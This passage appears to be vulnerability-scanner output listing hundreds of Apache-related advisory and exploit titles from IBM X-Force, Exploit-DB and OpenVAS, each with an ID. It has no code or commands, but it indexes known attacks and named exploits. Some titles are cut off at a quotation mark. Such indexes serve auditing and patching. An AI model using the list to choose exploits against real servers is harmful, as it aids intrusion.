15789| [34210] Apache Tomcat Accept-Language cross-site scripting
15790| [34209] Apache Tomcat calendar application cross-site scripting
15791| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
15792| [34167] Apache Axis WSDL file path disclosure
15793| [34068] Apache Tomcat AJP connector information disclosure
15794| [33584] Apache HTTP Server suEXEC privilege escalation
15795| [32988] Apache Tomcat proxy module directory traversal
15796| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
15797| [32708] Debian Apache tty privilege escalation
15798| [32441] ApacheStats extract() PHP call unspecified
15799| [32128] Apache Tomcat default account
15800| [31680] Apache Tomcat RequestParamExample cross-site scripting
15801| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
15802| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
15803| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
15804| [30456] Apache mod_auth_kerb off-by-one buffer overflow
15805| [29550] Apache mod_tcl set_var() format string
15806| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
15807| [28357] Apache HTTP Server mod_alias script source information disclosure
15808| [28063] Apache mod_rewrite off-by-one buffer overflow
15809| [27902] Apache Tomcat URL information disclosure
15810| [26786] Apache James SMTP server denial of service
15811| [25680] libapache2 /tmp/svn file upload
15812| [25614] Apache Struts lookupMap cross-site scripting
15813| [25613] Apache Struts ActionForm denial of service
15814| [25612] Apache Struts isCancelled() security bypass
15815| [24965] Apache mod_python FileSession command execution
15816| [24716] Apache James spooler memory leak denial of service
15817| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
15818| [24158] Apache Geronimo jsp-examples cross-site scripting
15819| [24030] Apache auth_ldap module multiple format strings
15820| [24008] Apache mod_ssl custom error message denial of service
15821| [24003] Apache mod_auth_pgsql module multiple syslog format strings
15822| [23612] Apache mod_imap referer field cross-site scripting
15823| [23173] Apache Struts error message cross-site scripting
15824| [22942] Apache Tomcat directory listing denial of service
15825| [22858] Apache Multi-Processing Module code allows denial of service
15826| [22602] RHSA-2005:582 updates for Apache httpd not installed
15827| [22520] Apache mod-auth-shadow "
15828| [22466] ApacheTop symlink
15829| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
15830| [22006] Apache HTTP Server byte-range filter denial of service
15831| [21567] Apache mod_ssl off-by-one buffer overflow
15832| [21195] Apache HTTP Server header HTTP request smuggling
15833| [20383] Apache HTTP Server htdigest buffer overflow
15834| [19681] Apache Tomcat AJP12 request denial of service
15835| [18993] Apache HTTP server check_forensic symlink attack
15836| [18790] Apache Tomcat Manager cross-site scripting
15837| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
15838| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
15839| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
15840| [17961] Apache Web server ServerTokens has not been set
15841| [17930] Apache HTTP Server HTTP GET request denial of service
15842| [17785] Apache mod_include module buffer overflow
15843| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
15844| [17473] Apache HTTP Server Satisfy directive allows access to resources
15845| [17413] Apache htpasswd buffer overflow
15846| [17384] Apache HTTP Server environment variable configuration file buffer overflow
15847| [17382] Apache HTTP Server IPv6 apr_util denial of service
15848| [17366] Apache HTTP Server mod_dav module LOCK denial of service
15849| [17273] Apache HTTP Server speculative mode denial of service
15850| [17200] Apache HTTP Server mod_ssl denial of service
15851| [16890] Apache HTTP Server server-info request has been detected
15852| [16889] Apache HTTP Server server-status request has been detected
15853| [16705] Apache mod_ssl format string attack
15854| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
15855| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
15856| [16230] Apache HTTP Server PHP denial of service
15857| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
15858| [15958] Apache HTTP Server authentication modules memory corruption
15859| [15547] Apache HTTP Server mod_disk_cache local information disclosure
15860| [15540] Apache HTTP Server socket starvation denial of service
15861| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
15862| [15422] Apache HTTP Server mod_access information disclosure
15863| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
15864| [15293] Apache for Cygwin "
15865| [15065] Apache-SSL has a default password
15866| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
15867| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
15868| [14751] Apache Mod_python output filter information disclosure
15869| [14125] Apache HTTP Server mod_userdir module information disclosure
15870| [14075] Apache HTTP Server mod_php file descriptor leak
15871| [13703] Apache HTTP Server account
15872| [13689] Apache HTTP Server configuration allows symlinks
15873| [13688] Apache HTTP Server configuration allows SSI
15874| [13687] Apache HTTP Server Server: header value
15875| [13685] Apache HTTP Server ServerTokens value
15876| [13684] Apache HTTP Server ServerSignature value
15877| [13672] Apache HTTP Server config allows directory autoindexing
15878| [13671] Apache HTTP Server default content
15879| [13670] Apache HTTP Server config file directive references outside content root
15880| [13668] Apache HTTP Server httpd not running in chroot environment
15881| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
15882| [13664] Apache HTTP Server config file contains ScriptAlias entry
15883| [13663] Apache HTTP Server CGI support modules loaded
15884| [13661] Apache HTTP Server config file contains AddHandler entry
15885| [13660] Apache HTTP Server 500 error page not CGI script
15886| [13659] Apache HTTP Server 413 error page not CGI script
15887| [13658] Apache HTTP Server 403 error page not CGI script
15888| [13657] Apache HTTP Server 401 error page not CGI script
15889| [13552] Apache HTTP Server mod_cgid module information disclosure
15890| [13550] Apache GET request directory traversal
15891| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
15892| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
15893| [13429] Apache Tomcat non-HTTP request denial of service
15894| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
15895| [13295] Apache weak password encryption
15896| [13254] Apache Tomcat .jsp cross-site scripting
15897| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
15898| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
15899| [12681] Apache HTTP Server mod_proxy could allow mail relaying
15900| [12662] Apache HTTP Server rotatelogs denial of service
15901| [12554] Apache Tomcat stores password in plain text
15902| [12553] Apache HTTP Server redirects and subrequests denial of service
15903| [12552] Apache HTTP Server FTP proxy server denial of service
15904| [12551] Apache HTTP Server prefork MPM denial of service
15905| [12550] Apache HTTP Server weaker than expected encryption
15906| [12549] Apache HTTP Server type-map file denial of service
15907| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
15908| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
15909| [12091] Apache HTTP Server apr_password_validate denial of service
15910| [12090] Apache HTTP Server apr_psprintf code execution
15911| [11804] Apache HTTP Server mod_access_referer denial of service
15912| [11750] Apache HTTP Server could leak sensitive file descriptors
15913| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
15914| [11703] Apache long slash path allows directory listing
15915| [11695] Apache HTTP Server LF (Line Feed) denial of service
15916| [11694] Apache HTTP Server filestat.c denial of service
15917| [11438] Apache HTTP Server MIME message boundaries information disclosure
15918| [11412] Apache HTTP Server error log terminal escape sequence injection
15919| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
15920| [11195] Apache Tomcat web.xml could be used to read files
15921| [11194] Apache Tomcat URL appended with a null character could list directories
15922| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
15923| [11126] Apache HTTP Server illegal character file disclosure
15924| [11125] Apache HTTP Server DOS device name HTTP POST code execution
15925| [11124] Apache HTTP Server DOS device name denial of service
15926| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
15927| [10938] Apache HTTP Server printenv test CGI cross-site scripting
15928| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
15929| [10575] Apache mod_php module could allow an attacker to take over the httpd process
15930| [10499] Apache HTTP Server WebDAV HTTP POST view source
15931| [10457] Apache HTTP Server mod_ssl "
15932| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
15933| [10414] Apache HTTP Server htdigest multiple buffer overflows
15934| [10413] Apache HTTP Server htdigest temporary file race condition
15935| [10412] Apache HTTP Server htpasswd temporary file race condition
15936| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
15937| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
15938| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
15939| [10280] Apache HTTP Server shared memory scorecard overwrite
15940| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
15941| [10241] Apache HTTP Server Host: header cross-site scripting
15942| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
15943| [10208] Apache HTTP Server mod_dav denial of service
15944| [10206] HP VVOS Apache mod_ssl denial of service
15945| [10200] Apache HTTP Server stderr denial of service
15946| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
15947| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
15948| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
15949| [10098] Slapper worm targets OpenSSL/Apache systems
15950| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
15951| [9875] Apache HTTP Server .var file request could disclose installation path
15952| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
15953| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
15954| [9623] Apache HTTP Server ap_log_rerror() path disclosure
15955| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
15956| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
15957| [9396] Apache Tomcat null character to threads denial of service
15958| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
15959| [9249] Apache HTTP Server chunked encoding heap buffer overflow
15960| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
15961| [8932] Apache Tomcat example class information disclosure
15962| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
15963| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
15964| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
15965| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
15966| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
15967| [8400] Apache HTTP Server mod_frontpage buffer overflows
15968| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
15969| [8308] Apache "
15970| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
15971| [8119] Apache and PHP OPTIONS request reveals "
15972| [8054] Apache is running on the system
15973| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
15974| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
15975| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
15976| [7836] Apache HTTP Server log directory denial of service
15977| [7815] Apache for Windows "
15978| [7810] Apache HTTP request could result in unexpected behavior
15979| [7599] Apache Tomcat reveals installation path
15980| [7494] Apache "
15981| [7419] Apache Web Server could allow remote attackers to overwrite .log files
15982| [7363] Apache Web Server hidden HTTP requests
15983| [7249] Apache mod_proxy denial of service
15984| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
15985| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
15986| [7059] Apache "
15987| [7057] Apache "
15988| [7056] Apache "
15989| [7055] Apache "
15990| [7054] Apache "
15991| [6997] Apache Jakarta Tomcat error message may reveal information
15992| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
15993| [6970] Apache crafted HTTP request could reveal the internal IP address
15994| [6921] Apache long slash path allows directory listing
15995| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
15996| [6527] Apache Web Server for Windows and OS2 denial of service
15997| [6316] Apache Jakarta Tomcat may reveal JSP source code
15998| [6305] Apache Jakarta Tomcat directory traversal
15999| [5926] Linux Apache symbolic link
16000| [5659] Apache Web server discloses files when used with php script
16001| [5310] Apache mod_rewrite allows attacker to view arbitrary files
16002| [5204] Apache WebDAV directory listings
16003| [5197] Apache Web server reveals CGI script source code
16004| [5160] Apache Jakarta Tomcat default installation
16005| [5099] Trustix Secure Linux installs Apache with world writable access
16006| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
16007| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
16008| [4931] Apache source.asp example file allows users to write to files
16009| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
16010| [4205] Apache Jakarta Tomcat delivers file contents
16011| [2084] Apache on Debian by default serves the /usr/doc directory
16012| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
16013| [697] Apache HTTP server beck exploit
16014| [331] Apache cookies buffer overflow
16015|
16016| Exploit-DB - https://www.exploit-db.com:
16017| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
16018| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
16019| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
16020| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
16021| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
16022| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
16023| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
16024| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
16025| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
16026| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
16027| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
16028| [29859] Apache Roller OGNL Injection
16029| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
16030| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
16031| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
16032| [29290] Apache / PHP 5.x Remote Code Execution Exploit
16033| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
16034| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
16035| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
16036| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
16037| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
16038| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
16039| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
16040| [27096] Apache Geronimo 1.0 Error Page XSS
16041| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
16042| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
16043| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
16044| [25986] Plesk Apache Zeroday Remote Exploit
16045| [25980] Apache Struts includeParams Remote Code Execution
16046| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
16047| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
16048| [24874] Apache Struts ParametersInterceptor Remote Code Execution
16049| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
16050| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
16051| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
16052| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
16053| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
16054| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
16055| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
16056| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
16057| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
16058| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
16059| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
16060| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
16061| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
16062| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
16063| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
16064| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
16065| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
16066| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
16067| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
16068| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
16069| [21719] Apache 2.0 Path Disclosure Vulnerability
16070| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
16071| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
16072| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
16073| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
16074| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
16075| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
16076| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
16077| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
16078| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
16079| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
16080| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
16081| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
16082| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
16083| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
16084| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
16085| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
16086| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
16087| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
16088| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
16089| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
16090| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
16091| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
16092| [20558] Apache 1.2 Web Server DoS Vulnerability
16093| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
16094| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
16095| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
16096| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
16097| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
16098| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
16099| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
16100| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
16101| [19231] PHP apache_request_headers Function Buffer Overflow
16102| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
16103| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
16104| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
16105| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
16106| [18442] Apache httpOnly Cookie Disclosure
16107| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
16108| [18221] Apache HTTP Server Denial of Service
16109| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
16110| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
16111| [17691] Apache Struts < 2.2.0 - Remote Command Execution
16112| [16798] Apache mod_jk 1.2.20 Buffer Overflow
16113| [16782] Apache Win32 Chunked Encoding
16114| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
16115| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
16116| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
16117| [15319] Apache 2.2 (Windows) Local Denial of Service
16118| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
16119| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
16120| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
16121| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
16122| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
16123| [12330] Apache OFBiz - Multiple XSS
16124| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
16125| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
16126| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
16127| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
16128| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
16129| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
16130| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
16131| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
16132| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
16133| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
16134| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
16135| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
| [466] htpasswd Apache 1.3.31 - Local Exploit
| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
| [9] Apache HTTP Server 2.x Memory Leak Exploit
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
| [900571] Apache APR-Utils Version Detection
| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
| [900496] Apache Tiles Multiple XSS Vulnerability
| [900493] Apache Tiles Version Detection
| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
| [870175] RedHat Update for apache RHSA-2008:0004-01
| [864591] Fedora Update for apache-poi FEDORA-2012-10835
| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
| [864250] Fedora Update for apache-poi FEDORA-2012-7683
| [864249] Fedora Update for apache-poi FEDORA-2012-7686
| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
| [855821] Solaris Update for Apache 1.3 122912-19
| [855812] Solaris Update for Apache 1.3 122911-19
| [855737] Solaris Update for Apache 1.3 122911-17
| [855731] Solaris Update for Apache 1.3 122912-17
| [855695] Solaris Update for Apache 1.3 122911-16
| [855645] Solaris Update for Apache 1.3 122912-16
| [855587] Solaris Update for kernel update and Apache 108529-29
| [855566] Solaris Update for Apache 116973-07
| [855531] Solaris Update for Apache 116974-07
| [855524] Solaris Update for Apache 2 120544-14
| [855494] Solaris Update for Apache 1.3 122911-15
| [855478] Solaris Update for Apache Security 114145-11
| [855472] Solaris Update for Apache Security 113146-12
| [855179] Solaris Update for Apache 1.3 122912-15
| [855147] Solaris Update for kernel update and Apache 108528-29
| [855077] Solaris Update for Apache 2 120543-14
| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
| [850088] SuSE Update for apache2 SUSE-SA:2007:061
| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
| [841209] Ubuntu Update for apache2 USN-1627-1
| [840900] Ubuntu Update for apache2 USN-1368-1
| [840798] Ubuntu Update for apache2 USN-1259-1
| [840734] Ubuntu Update for apache2 USN-1199-1
| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
| [835253] HP-UX Update for Apache Web Server HPSBUX02645
| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
| [835236] HP-UX Update for Apache with PHP HPSBUX02543
| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
| [835188] HP-UX Update for Apache HPSBUX02308
| [835181] HP-UX Update for Apache With PHP HPSBUX02332
| [835180] HP-UX Update for Apache with PHP HPSBUX02342
| [835172] HP-UX Update for Apache HPSBUX02365
| [835168] HP-UX Update for Apache HPSBUX02313
| [835148] HP-UX Update for Apache HPSBUX01064
| [835139] HP-UX Update for Apache with PHP HPSBUX01090
| [835131] HP-UX Update for Apache HPSBUX00256
| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
| [835104] HP-UX Update for Apache HPSBUX00224
| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
| [835101] HP-UX Update for Apache HPSBUX01232
| [835080] HP-UX Update for Apache HPSBUX02273
| [835078] HP-UX Update for ApacheStrong HPSBUX00255
| [835044] HP-UX Update for Apache HPSBUX01019
| [835040] HP-UX Update for Apache PHP HPSBUX00207
| [835025] HP-UX Update for Apache HPSBUX00197
| [835023] HP-UX Update for Apache HPSBUX01022
| [835022] HP-UX Update for Apache HPSBUX02292
| [835005] HP-UX Update for Apache HPSBUX02262
| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
